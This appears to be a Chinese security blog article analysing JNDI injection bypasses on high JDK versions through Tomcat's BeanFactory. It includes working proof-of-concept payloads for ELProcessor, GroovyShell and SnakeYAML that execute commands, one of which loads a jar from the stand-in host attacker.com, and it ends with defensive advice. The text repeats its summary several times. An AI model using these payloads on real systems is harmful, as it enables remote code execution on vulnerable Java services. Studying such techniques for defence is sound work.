高版本JNDI限制Bypass：攻击路径挖掘与利用技术分析<\/h1>

前言<\/h2>
JNDI (Java Naming and Directory Interface) 漏洞是Java框架中一个非常有效的远程代码执行(RCE)漏洞。随着JDK版本的提高，Oracle对JNDI注入漏洞实施了一系列防护措施，特别是在高版本JDK中限制了远程类的加载。本文将详细分析高版本JDK下的JNDI利用绕过技术。<\/p>

高版本JNDI限制分析<\/h2>

在JDK高版本中，主要的限制体现在javax.naming.spi.NamingManager#getObjectInstance<\/code>方法中：<\/p>


禁止从远程代码库加载类<\/li>
限制了可实例化的对象类型<\/li>
<\/ol>
传统利用方式如直接加载远程恶意类已不再可行，因此需要寻找新的攻击路径。<\/p>
绕过原理与技术路线<\/h2>
核心绕过思路<\/h3>
利用工厂类的getObjectInstance<\/code>方法作为跳板，寻找可以间接执行代码的途径。关键点在于：<\/p>

找到一个可利用的工厂类<\/li>
该工厂类的getObjectInstance<\/code>方法存在可利用的逻辑<\/li>
能够通过参数控制执行流程<\/li>
<\/ol>
关键类：BeanFactory<\/h3>
BeanFactory<\/code>成为高版本绕过的重要突破口，其getObjectInstance<\/code>方法的工作流程如下：<\/p>

检查传入的obj<\/code>是否为ResourceRef<\/code>类型<\/li>
获取目标类并进行加载和实例化<\/li>
解析forceString<\/code>属性

查找setter方法<\/li>
将显式指定的setter方法存入forced映射<\/li>
<\/ul>
<\/li>
遍历调用setter方法<\/li>
<\/ol>
利用点<\/strong>：通过控制setter方法的调用，可以间接执行恶意代码，且这些setter方法只能接受String类型的参数。<\/p>
具体利用技术<\/h2>
1. ELProcessor利用<\/h3>
目标类<\/strong>：javax.el.ELProcessor<\/code><\/p>
可利用方法<\/strong>：<\/p>
public<\/span> Object eval<\/span>(<\/span>String expression)<\/span>
<\/span><\/span><\/code><\/pre>利用条件<\/strong>：<\/p>

可以执行EL表达式<\/li>
只需要传入String参数<\/li>
<\/ul>
POC示例<\/strong>：<\/p>
ResourceRef ref =<\/span> new<\/span> ResourceRef(<\/span>"javax.el.ELProcessor"<\/span>,<\/span> null<\/span>,<\/span> ""<\/span>,<\/span> ""<\/span>,<\/span> true<\/span>,<\/span> "org.apache.naming.factory.BeanFactory"<\/span>,<\/span> null<\/span>);<\/span>
<\/span><\/span>ref.<\/span>add<\/span>(<\/span>new<\/span> StringRefAddr(<\/span>"forceString"<\/span>,<\/span> "x=eval"<\/span>));<\/span>
<\/span><\/span>ref.<\/span>add<\/span>(<\/span>new<\/span> StringRefAddr(<\/span>"x"<\/span>,<\/span> "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['calc']).start()\")"<\/span>));<\/span>
<\/span><\/span><\/code><\/pre>调用栈<\/strong>：<\/p>

BeanFactory.getObjectInstance()<\/code><\/li>
ELProcessor.eval()<\/code><\/li>
执行EL表达式弹出计算器<\/li>
<\/ol>
2. GroovyShell利用<\/h3>
目标类<\/strong>：groovy.lang.GroovyShell<\/code><\/p>
可利用方法<\/strong>：<\/p>
public<\/span> Object evaluate<\/span>(<\/span>String script)<\/span>
<\/span><\/span><\/code><\/pre>利用条件<\/strong>：<\/p>

可以执行Groovy代码<\/li>
只需要传入String参数<\/li>
<\/ul>
POC示例<\/strong>：<\/p>
ResourceRef ref =<\/span> new<\/span> ResourceRef(<\/span>"groovy.lang.GroovyShell"<\/span>,<\/span> null<\/span>,<\/span> ""<\/span>,<\/span> ""<\/span>,<\/span> true<\/span>,<\/span> "org.apache.naming.factory.BeanFactory"<\/span>,<\/span> null<\/span>);<\/span>
<\/span><\/span>ref.<\/span>add<\/span>(<\/span>new<\/span> StringRefAddr(<\/span>"forceString"<\/span>,<\/span> "x=evaluate"<\/span>));<\/span>
<\/span><\/span>ref.<\/span>add<\/span>(<\/span>new<\/span> StringRefAddr(<\/span>"x"<\/span>,<\/span> "''.class.forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval('new java.lang.ProcessBuilder[\"(java.lang.String[])\"]([\"calc\"]).start()')"<\/span>));<\/span>
<\/span><\/span><\/code><\/pre>调用栈<\/strong>：<\/p>

BeanFactory.getObjectInstance()<\/code><\/li>
GroovyShell.evaluate()<\/code><\/li>
执行Groovy代码弹出计算器<\/li>
<\/ol>
3. SnakeYAML利用<\/h3>
目标类<\/strong>：org.yaml.snakeyaml.Yaml<\/code><\/p>
可利用方法<\/strong>：<\/p>
public<\/span> Object load<\/span>(<\/span>String yaml)<\/span>
<\/span><\/span><\/code><\/pre>利用条件<\/strong>：<\/p>

需要SnakeYAML库存在<\/li>
可以利用YAML反序列化漏洞<\/li>
只需要传入String参数<\/li>
<\/ul>
POC示例<\/strong>：<\/p>
ResourceRef ref =<\/span> new<\/span> ResourceRef(<\/span>"org.yaml.snakeyaml.Yaml"<\/span>,<\/span> null<\/span>,<\/span> ""<\/span>,<\/span> ""<\/span>,<\/span> true<\/span>,<\/span> "org.apache.naming.factory.BeanFactory"<\/span>,<\/span> null<\/span>);<\/span>
<\/span><\/span>ref.<\/span>add<\/span>(<\/span>new<\/span> StringRefAddr(<\/span>"forceString"<\/span>,<\/span> "x=load"<\/span>));<\/span>
<\/span><\/span>ref.<\/span>add<\/span>(<\/span>new<\/span> StringRefAddr(<\/span>"x"<\/span>,<\/span> "!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL [\"http:\/\/attacker.com\/yaml-payload.jar\"]]]]"<\/span>));<\/span>
<\/span><\/span><\/code><\/pre>验证方式<\/strong>：

可以通过DNS查询验证漏洞是否存在，观察是否有DNS查询请求发出。<\/p>
防御建议<\/h2>

升级JDK<\/strong>：使用最新版本的JDK，并确保安全补丁已应用<\/li>
输入验证<\/strong>：对所有JNDI查找输入进行严格验证<\/li>
安全配置<\/strong>：

设置com.sun.jndi.rmi.object.trustURLCodebase=false<\/code><\/li>
设置com.sun.jndi.cosnaming.object.trustURLCodebase=false<\/code><\/li>
<\/ul>
<\/li>
最小权限原则<\/strong>：限制应用程序的运行权限<\/li>
依赖管理<\/strong>：移除不必要的依赖，特别是SnakeYAML等可能被利用的库<\/li>
<\/ol>
总结<\/h2>
高版本JDK下JNDI注入的利用虽然受到限制，但通过精心构造的攻击链仍然可以实现RCE。本文详细分析了三种有效的绕过技术，安全团队应充分了解这些攻击技术以构建更完善的防御体系。<\/p>

高版本JNDI限制Bypass：攻击路径挖掘与利用技术分析<\/h1>

绕过原理与技术路线<\/h2>

总结<\/h2> 高版本JDK下JNDI注入的利用虽然受到限制，但通过精心构造的攻击链仍然可以实现RCE。本文详细分析了三种有效的绕过技术，安全团队应充分了解这些攻击技术以构建更完善的防御体系。<\/p>

总结<\/h2>
高版本JDK下JNDI注入的利用虽然受到限制，但通过精心构造的攻击链仍然可以实现RCE。本文详细分析了三种有效的绕过技术，安全团队应充分了解这些攻击技术以构建更完善的防御体系。<\/p>